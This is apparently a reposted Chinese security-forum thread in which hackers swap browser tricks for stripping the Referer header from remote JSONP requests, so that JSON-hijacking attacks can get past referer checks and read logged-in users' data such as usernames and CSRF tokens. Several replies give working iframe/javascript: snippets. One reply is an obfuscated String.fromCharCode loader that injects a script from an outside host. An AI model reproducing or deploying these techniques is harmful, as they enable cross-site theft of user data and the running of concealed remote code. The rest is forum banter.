如何调用一个远程 js callback 并让浏览器不发送 referer?

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-06-17 17:36

rt?

调用远程js或callback时浏览器默认会发送当前页面地址(HTTP头中referer)。

求解如何调用并且使浏览器不发送来路信息呢?

[原帖地址]

相关讨论:

1#

/fd (madafaka #swag #yolo) | 2014-06-17 17:44

iframe 下 about:blank origin

2#

过客 | 2014-06-17 18:19

老问题了,之前讨论过的。http://zone.wooyun.org/content/744

3#

/fd (madafaka #swag #yolo) | 2014-06-17 19:16

但注意新的RFC HTTP/1.1协议會区别about:blank

4#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-06-18 08:46

@/fd 求例子~

5#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-06-18 08:47

@过客 三克斯,寡人去看看。

6#

xsjswt | 2014-06-18 10:05

JS跨域抓取已登录的百度用户用户名和csrf token

7#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-06-18 13:01

@xsjswt 这..有浏览器限制吗?

一个测试可用的例子: 

<body>
</body>
<script language="javascript">

function test(c) {
    alert(c);
}

window.img = "<script>fucntion x(c){parent.test(c);}<\/script><script id='img' src='http://www.baidu.com/?callback=x'><\/script>";

var i = document.createElement("iframe");
i.src = "javascript:parent.img;";
i.id = "frameImg" + Math.random();
//i.scrolling = "no";
//i.setAttribute("frameborder", "0", 0);
//i.style.width = "0px";
//i.style.height = "0px";
//i.style.display = none;
document.body.appendChild(i);

</script>

json hijack如何丢掉referer

请叫我大神 | 2012-08-08 01:37 

<script>
func(str) {
    alert(str)
}
</script>
<script src=http://www.xxx.com/xxx.cgi?callback=func ></script>

这种的攻击,如果http://www.xxx.com/xxx.cgi?callback=func 之针对referer 为 xxx.com域或者referer为空的才能出数据。如何绕过?

目前已知的是用一些跨协议的方法,比如https等,有更好的方法么?

[原文地址]

相关讨论:

1#

蟋蟀哥哥 (?????????????????????????) | 2012-08-08 01:54

自己javascript构造get或post试试呢

2#

piao2010 | 2012-08-08 09:41

Ajax是不行的,再往底层一点去,据说WinHttp可以。

3#

piao2010 | 2012-08-08 09:45

另外再引入一个脚本(语言任意,能构造HTTP请求即可),把相关参数传入,构造的HTTP请求里字段就随便玩了。

4#

xsser (十根阳具有长短!!) | 2012-08-08 10:05

必须浏览器里一层找到方法 好像没有特别好的 用media player?

5#

Sogili (.) 长短短 (.) | 2012-08-08 10:19 

<iframe src="data:text/html,<script src=http://www.baidu.com></script>">

http://jsbin.com/eduyid/

不过IE不支持:(

6#

请叫我大神 | 2012-08-08 11:25

@Sogili 是啊,就是想找个通用的方法

7#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 12:56 

<iframe id="aa" src=""></iframe>
<script>
document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
</script>

8#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 12:56

= = 上面代码好像没显示完整。。。 

<iframe id="aa" src=""></iframe>
<script>
document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
</script>

9#

_Evil (尘俗当中有太多人 相识过爱不到) | 2012-08-08 12:56

看热闹学习东西

10#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 12:58

原理是利用 xxx.src='javascript:"HTML代码的方式"'; 可以去掉refer

11#

_Evil (尘俗当中有太多人 相识过爱不到) | 2012-08-08 12:59

@gainover 你已经超越神了。。。 轻松的绕过 0.0 妙

12#

p.z (一回头 青春都喂了狗) | 2012-08-08 13:14

@gainover 顶

13#

lanz | 2012-08-08 14:29

@gainover 表示IE下还是有referer啊

14#

xsjswt | 2012-08-08 14:31

@xsser 无码无真相,球media player的

15#

Zvall (safeKey team - 电击小子) | 2012-08-08 14:34

围观!!!!!!!

16#

Sogili (.) 长短短 (.) | 2012-08-08 14:37

@lanz 

<iframe src="javascript:'<script src=http://www.baidu.com></script>'"></iframe>

这样呢?

17#

xsser (十根阳具有长短!!) | 2012-08-08 14:38

@gainover 我要送你乌云币!

18#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 15:05

@lanz Wo zheli zhuabao meiyOu refer a.....

19#

Sogili (.) 长短短 (.) | 2012-08-08 15:07

@gainover 我这也有,但用我在楼上留的代码就没有:(

20#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 15:21

@lanz @Sogili IE几呢? 我IE8 试的是没 refer的 。。

21#

insight-labs (Root Yourself in Success) | 2012-08-08 15:23

@请叫我大神 ftp很好用,火狐不支持,配合@Sogili 的方法做个判断,差不多了!

22#

Sogili (.) 长短短 (.) | 2012-08-08 15:26

@gainover IE8

23#

rayh4c | 2012-08-08 15:34

about:blank页发起的请求没referer

24#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 15:35

@Sogili = = 这么奇怪, 难道是某个补丁补掉了?

25#

请叫我大神 | 2012-08-08 16:01

@rayh4c show me the code,wtf

26#

also (我姓王名大锤,我万万没有想到我成了乌云修电脑的。) | 2012-08-08 16:17

@gainover 膜拜大牛

27#

rayh4c | 2012-08-08 16:38

@请叫我大神 src等于空,都是about:blank页,空白页,在空白页里发起请求当然没referer,关键在于此。

28#

Sogili (.) 长短短 (.) | 2012-08-08 16:58

@rayh4c = = 如果write了就会有referer

29#

rayh4c | 2012-08-08 17:18

@Sogili write会有是DOM对象关联了about:blank页的父窗口的原因,可以找个非about:blank页用这些方法试试,应该会有referer。

30#

Sogili (.) 长短短 (.) | 2012-08-08 17:20 

<iframe src="" id=x></iframe>
<script defer>
x.document.body.innerHTML='-<script defer src=http://www.baidu.com><\/script>';
</script>

31#

rayh4c | 2012-08-08 17:30

@Sogili - -!! 我的意思是你可以找个正常网站用伪协议把下面的代码注进去,肯定会有referer 

javascript:'<script src=http://www.baidu.com><\/script>'

你这个代码如果是在非about:blank页肯定会有referer,用DOM调就有父子窗口关系了。

32#

Sogili (.) 长短短 (.) | 2012-08-08 17:34

@rayh4c 我这测试是没有:)

33#

Sogili (.) 长短短 (.) | 2012-08-08 17:37

@rayh4c write有,innerHTML无 :(

34#

rayh4c | 2012-08-08 17:53

@Sogili 确实没有,X动态添加的还是about:blank,Y页write后就不是about:blank了。 

<iframe src="" id=x></iframe>
<script defer>
x.document.body.innerHTML='-<script defer>alert(\'x:\'+window.parent.x.location)<\/script>';
</script>

<iframe src="" id=y></iframe>
<script defer>
y.document.write('-<script defer>alert(\'y:\'+window.parent.y.location)<\/script>');
</script>

35#

Sogili (.) 长短短 (.) | 2012-08-08 18:08

@rayh4c 嗯,的确

36#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 22:59

@Sogili 回寝室后,又测试了一下, 经过测试,这样写没refer。 看来这里不能用JS再动态调用一次,只能直接<script>插入了。

37#

lanz | 2012-08-10 10:15

@Sogili @gainover 伺候好了IE,ff又不干了,此事难两全哪,还是直接用https省事

38#

啤酒 (xx) | 2012-08-10 23:41

要是想拿到返回数据喃?

39#

啤酒 (xx) | 2012-08-10 23:51

@Zvall http://zone.wooyun.org/upload/avatar/avatar_686_b.jpg 头像猜拿到的?

留言评论(旧系统):

佚名 @ 2014-06-19 16:32:21

核总最近更新少了啊 我不再做技术了,以后开始忽悠之路,立帖为证; 再跟你显摆一下:核总我有女朋友了 :)

本站回复:

最近略忙啊,所以更新时间少了,对了,你女朋友是左手还是右手,难道是充气的?